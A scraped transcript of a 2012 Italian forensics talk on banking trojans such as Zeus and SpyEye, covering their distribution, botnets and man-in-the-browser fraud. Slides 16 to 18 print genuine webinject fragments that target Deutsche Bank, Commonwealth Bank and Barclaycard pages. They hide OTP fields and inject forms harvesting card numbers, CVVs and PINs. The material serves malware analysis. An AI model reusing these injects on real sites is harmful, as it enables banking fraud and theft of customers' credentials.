1 / 21

Malware Bancario

Malware Bancario. Introduzione Al Crimeware nel Settore Bancario PRESI NELLA RETE - Collegio GHISLIERI 2 3 Novembre 2012. Dott. Francesco Schifilliti. Cos’è un Banking Trojan ?. This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts.

bonita
Download Presentation

Malware Bancario

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Malware Bancario Introduzione Al Crimeware nel Settore Bancario PRESI NELLA RETE - Collegio GHISLIERI 23 Novembre 2012 Dott. Francesco Schifilliti

  2. Cos’è un Banking Trojan? This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking. 001

  3. Zeus, SpyEye… e tanti altri • Torpig • Zeus • SpyEye • Ares • Tatanga • Oddjob • Carberp • Zeus • GameOver • Gataka • Shylock • Citadel • Cridex 002

  4. Soggetti (minimi) Coinvolti 003

  5. BlackMarket • (Freelance developers) Malware Developing • Developers • (Affiliates) • CyberCrime • Organization 004

  6. Malware Distribution • Malware • Authors ? • User 005

  7. Malware Distribution • Malware • Authors Pay-per-Install Drive-by-Download Exploit-as-a-Services 006

  8. Ciclo Pay-per-Install • Malware • Authors • Kingpin Exploit-as-a-Services 007

  9. Trojan • Repository Fase di Infezione e Controllo Infection Mail di Spam Compromised Web Site Exploit Pack Infection 008

  10. Iterandoilprocessod’Infezione… Flat Botnet P2P Botnet 009

  11. Ciclo d’Infezione di un Malware sul PC 010

  12. Odore di $$$ data theft • C & C • Server • User data & session theft 011

  13. Man in the Browser SO User- land Kernel- land 012

  14. Anti-Detection/DeceptionTechniques MW Code 013

  15. Struttura di SpyEye C&C Packer P Obfuscation Anti-Dbg • Plugin del Malware: • config.dat, ccgrabber • collectors, sock5 • customconnector • webinjectors.txt Binary 014

  16. Un pezzettino di Webinjector di uno SpyEye 10.7 ….. set_url*meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP data_before <body data_end data_inject style="visibility:hidden” data_end data_after id= data_end data_before </body> data_end data_inject <script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script> <script src='/error.html/trxm1/dbcommon.js'></script> <script src='/error.html/trxm1/dbsepa.js'></script> <script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script> data_end data_after </html> data_end ….. 015

  17. Un pezzettino di Webinjector di un ATS ….. set_url *commbank.com.au/netbank/UserMaintenance* GP data_before <h1 class="PageTitle">*My Q*</h1> data_end data_inject <script language="javascript" type="text/javascript”> window.onload = function() { for ( i=0; i < document.links.length; i++ ) if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink’) document.links[i].onclick = function() { return false; }; }; </script> <script language="javascript" type="text/javascript”> varclck_counter = 0; function msg() { clck_counter++; if (clck_counter==2) {document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden”;document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "nonedocument.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true; document.getElementById('error').style.top = 42; document.getElementById('error').style.left = 42; document.getElementById('error').style.visibility = "visible”; document.getElementById('error').style.display = "block”; } return false; } ….. 016

  18. Webinject in Chiaro nella RAM https://bcol.barclaycard.co.uk*cardSummary*∏‹∏:](ÈÈÈ∏Í∏Í√ <style type="text/css"> #inject { display: none; } .ui-dialog { width: 400px; font-size: 11px; } .ui-dialog .ui-dialog-titlebar-close { visibility: hidden; } .ui-dialog .ui-dialog-titlebar{ visibility: hidden; display: none; } </style>Pfiıº| ÓΩ|HÓΩ|pÓΩ|òÓ≤ıº|¿ÓΩ|ËÓ∏˘º|Ô˙º|8Ô˙º|`ÔπàÔπ∞Ô∫ÿÔ∫–·∞Ô <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script> value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) { ……. 017

  19. SpyEye: esempio di MW modulare e parametrico Cosa/Come Rubareèdefinito in base ai Plugin Installatisulla Bot. billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9 bugreport.dll_a6c1992119c1550db437aac86d4ffdad ccgrabber.dll_5b1593855a6e8f01468878eb88be39df creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5 Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 rdp.dll_0cb722049e024f2366ba9c187cb3929f ddos.dll_716d82810241daa5e2a41327014e9a77 … • C & C • Server • Collector • Collector • Collector su Quale Banca/Ist. Finanziario fare operazioni in Frodeè definito in webinjectors.txt • User a Chi Trasmettereidaticollezionati dal MW èdefinitoin collectors.txt 018

  20. Uno Schema di Riferimento dell’Analisi PIENA COMPRENSIONE DEL FORENSIC ARTIFACT 019

  21. GRAZIE Francesco Schifilliti fschifilliti@forensictech.it

More Related